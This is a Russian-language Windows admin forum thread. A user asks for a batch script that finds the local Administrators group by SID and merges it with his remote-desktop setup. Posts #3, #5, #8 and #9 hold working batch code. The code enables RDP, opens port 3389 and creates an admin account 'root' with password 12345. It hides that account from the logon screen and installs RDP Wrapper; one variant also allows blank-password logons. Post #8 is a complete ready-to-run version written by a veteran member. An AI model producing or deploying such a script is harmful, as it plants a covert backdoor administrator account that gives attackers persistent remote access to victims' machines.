|
Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Скриптовые языки администрирования Windows » CMD/BAT - [решено] автоматически определять группу администраторов на любой системе |
|
|
CMD/BAT - [решено] автоматически определять группу администраторов на любой системе
|
Новый участник Сообщения: 30 |
Профиль | Отправить PM | Цитировать Нужно сделать код какой будет автоматически определять группа администраторов на любой системе.
|
|
Отправлено: 20:06, 14-08-2017 |
Ветеран Сообщения: 27449
|
Профиль | Отправить PM | Цитировать Well-known security identifiers in Windows operating systems
@echo off setlocal enableextensions enabledelayedexpansion for /f "usebackq delims=" %%i in ( `wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"` ) do set sAdminGroup%%i if defined sAdminGroupName ( echo [%sAdminGroupName%] ) endlocal exit /b 0 |
Отправлено: 20:29, 14-08-2017 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Новый участник Сообщения: 30
|
Профиль | Отправить PM | Цитировать А как его можно совместить с RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow net user root /add net localgroup Administrator root /add net user root 12345 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f "RDPWInst.exe" -i -o "RDPWInst.exe" -w |
Отправлено: 20:45, 14-08-2017 | #3 |
Ветеран Сообщения: 27449
|
Профиль | Отправить PM | Цитировать |
Отправлено: 21:23, 14-08-2017 | #4 |
Новый участник Сообщения: 30
|
Профиль | Отправить PM | Цитировать reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow if defined sAdminGroupName ( net.exe localgroup "%sAdminGroupName%" "root" /add) net localgroup Administrator root /add net user root 12345 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f "RDPWInst.exe" -i -o "RDPWInst.exe" -w |
|
Отправлено: 22:25, 14-08-2017 | #5 |
Ветеран Сообщения: 27449
|
Профиль | Отправить PM | Цитировать Цитата DetFedot:
|
|
Отправлено: 22:30, 14-08-2017 | #6 |
Новый участник Сообщения: 30
|
Профиль | Отправить PM | Цитировать А можете помочь как мне его луче поместить в код чтоб он работал
|
Отправлено: 22:33, 14-08-2017 | #7 |
Ветеран Сообщения: 27449
|
Профиль | Отправить PM | Цитировать @echo off setlocal enableextensions enabledelayedexpansion for /f "usebackq delims=" %%i in ( `wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"` ) do set sAdminGroup%%i reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow net.exe user "root" "12345" /add if defined sAdminGroupName ( net.exe localgroup "%sAdminGroupName%" "root" /add ) reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "root" /t REG_DWORD /d 0 /f "RDPWInst.exe" -i -o "RDPWInst.exe" -w endlocal exit /b 0 |
Отправлено: 23:13, 14-08-2017 | #8 |
Новый участник Сообщения: 30
|
Профиль | Отправить PM | Цитировать А может тогда помочь реализовать и другой RDP код
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow "RDPWInst.exe" -i -o "RDPWInst.exe" -w |
Отправлено: 00:44, 15-08-2017 | #9 |
Ветеран Сообщения: 27449
|
Профиль | Отправить PM | Цитировать DetFedot, поясните Вашу мысль.
|
Отправлено: 01:07, 15-08-2017 | #10 |
|
Участник сейчас на форуме | Участник вне форума | Автор темы | Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Доступ - [решено] Windows 8.1 9600 UAC препятствует вернуть учетную запись в группу администраторов | cshapr | Microsoft Windows 8 и 8.1 | 2 | 30-04-2017 01:27 | |
2010 - WORD 2010 Не работает "Автоматически при вводе определять стили" | test2235 | Microsoft Office (Word, Excel, Outlook и т.д.) | 3 | 11-11-2013 12:38 | |
Добавление доменной группы в группу локальных администраторов | gadkin | Microsoft Windows NT/2000/2003 | 18 | 12-10-2010 11:47 | |
Как добавить пользователя в группу администраторов из DOS | babki | Microsoft Windows 2000/XP | 2 | 09-01-2006 13:49 | |
[решено] Как грамотно создать новую группу пользователей с особыми правами в системе? | Gerdewski | Microsoft Windows NT/2000/2003 | 10 | 18-07-2005 14:05 |
|